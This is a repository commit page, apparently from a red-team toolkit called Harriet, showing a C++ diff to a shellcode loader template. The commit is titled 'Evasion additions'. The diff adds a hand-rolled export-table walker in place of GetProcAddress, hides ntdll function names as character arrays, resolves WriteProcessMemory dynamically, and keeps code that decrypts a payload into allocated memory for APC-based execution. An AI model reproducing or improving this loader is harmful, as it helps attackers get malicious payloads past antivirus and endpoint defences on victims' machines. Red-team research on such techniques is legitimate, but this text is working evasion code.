Acasă Explorează Ajutor
Autentificare
zhensolid
/
Home-Grown-Red-Team
1
0
Bifurcare 0
Fisiere Probleme 0 Trageți solicitările 0 Wiki
Răsfoiți Sursa

Update template.cpp

Evasion additions
assume-breach 2 ani în urmă
părinte
406a9a36a2
comite
ffcc66e5ea
1 a modificat fișierele cu 60 adăugiri și 9 ștergeri
Vizualizare divizată Arată Statisticile Diff
  1. 60 9
      Harriet/Harriet/QueueUserAPC/template.cpp

+ 60 - 9
Harriet/Harriet/QueueUserAPC/template.cpp
Vizualizați fișierul 

@@ -9,13 +9,47 @@
 
 #pragma comment (lib, "advapi32")
 
 #pragma comment(lib, "ntdll")
 
 
-using Random6 = NTSTATUS(NTAPI*)();
 
+// Custom GetProcAddress function
 
+typedef FARPROC(__stdcall* ARPROC)(HMODULE, LPCSTR);
 
+
 
+FARPROC myGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
 
+    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
 
+    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);
 
+    PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule +
 
+        ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
 
+
 
+    DWORD* addressOfFunctions = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfFunctions);
 
+    WORD* addressOfNameOrdinals = (WORD*)((BYTE*)hModule + exportDirectory->AddressOfNameOrdinals);
 
+    DWORD* addressOfNames = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfNames);
 
+
 
+    for (DWORD i = 0; i < exportDirectory->NumberOfNames; ++i) {
 
+        if (strcmp(lpProcName, (const char*)hModule + addressOfNames[i]) == 0) {
 
+            return (FARPROC)((BYTE*)hModule + addressOfFunctions[addressOfNameOrdinals[i]]);
 
+        }
 
+    }
 
+
 
+    return NULL;
 
+}
 
 
-static NTSTATUS(__stdcall *NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
 
+typedef BOOL(WINAPI* WriteProcessMemoryPtr)(
 
+    HANDLE hProcess,
 
+    LPVOID lpBaseAddress,
 
+    LPCVOID lpBuffer,
 
+    SIZE_T nSize,
 
+    SIZE_T* lpNumberOfBytesWritten
 
+);
 
 
-static NTSTATUS(__stdcall *ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
 
+unsigned char HvqNFK[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0 };
 
+unsigned char sQKsNqz[] = { 'N', 't', 'D', 'e', 'l', 'a', 'y', 'E', 'x', 'e', 'c', 'u', 't', 'i', 'o', 'n', 0x0 };
 
+unsigned char UHVQNq[] = { 'Z', 'w', 'S', 'e', 't', 'T', 'i', 'm', 'e', 'r', 'R', 'e', 's', 'o', 'l', 'u', 't', 'i', 'o', 'n', 0x0 };
 
 
-static void SleepShort(float milliseconds) {
 
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
 
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))myGetProcAddress(GetModuleHandle(HvqNFK), sQKsNqz);
 
+
 
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
 
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))myGetProcAddress(GetModuleHandle(HvqNFK), UHVQNq);
 
+
 
+static void Random4(float milliseconds) {
 
     static bool once = true;
 
     if (once) {
 
         ULONG actualResolution;
 
@@ -27,8 +61,10 @@ static void SleepShort(float milliseconds) {
 
     interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
 
     NtDelayExecution(false, &interval);
 
 }
 
-unsigned char sntdll[] = {'n','t','d','l','l', 0x0};
 
-unsigned char sNtA[] = {'N','t','T','e','s','t','A','l','e','r','t', 0x0 };
 
+
 
+using Random6 = NTSTATUS(NTAPI*)();
 
+
 
+unsigned char sNtA[] = { 'N','t','T','e','s','t','A','l','e','r','t', 0x0 };
 
 
 int DecryptData(char* Random3, unsigned int Random3_len, char* Random2, int Random2len) {
 
     HCRYPTPROV hProv;
 
@@ -69,7 +105,7 @@ int main() {
 
 
     FreeConsole();
 
 
-    Random6 Random7 = (Random6)(GetProcAddress(GetModuleHandleA(sntdll), sNtA));
 
+    Random6 Random7 = (Random6)(GetProcAddress(GetModuleHandleA(HvqNFK), (LPCSTR)sNtA));
 
 
     SIZE_T Random4 = sizeof(Random3);
 
 
@@ -80,9 +116,24 @@ int main() {
 
 
     LPVOID Random5 = VirtualAlloc(NULL, Random4, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 
 
-    SleepShort(3000);
 
+    Sleep(3000); // Corrected Sleep function name
 
+
 
+    WriteProcessMemoryPtr pWriteProcessMemory =
 
+reinterpret_cast<WriteProcessMemoryPtr>(myGetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
 
 
-    WriteProcessMemory(GetCurrentProcess(), Random5, Random3, Random4, NULL);
 
+
 
+if (pWriteProcessMemory != nullptr) {
 
+    // Using native API WriteProcessMemory
 
+    if (pWriteProcessMemory(GetCurrentProcess(), Random5, Random3, Random4, nullptr)) {
 
+        
+    }
 
+    else {
 
+        
+    }
 
+}
 
+else {
 
+   
+}
 
 
     RtlCopyMemory(Random5, Random3, Random3_len);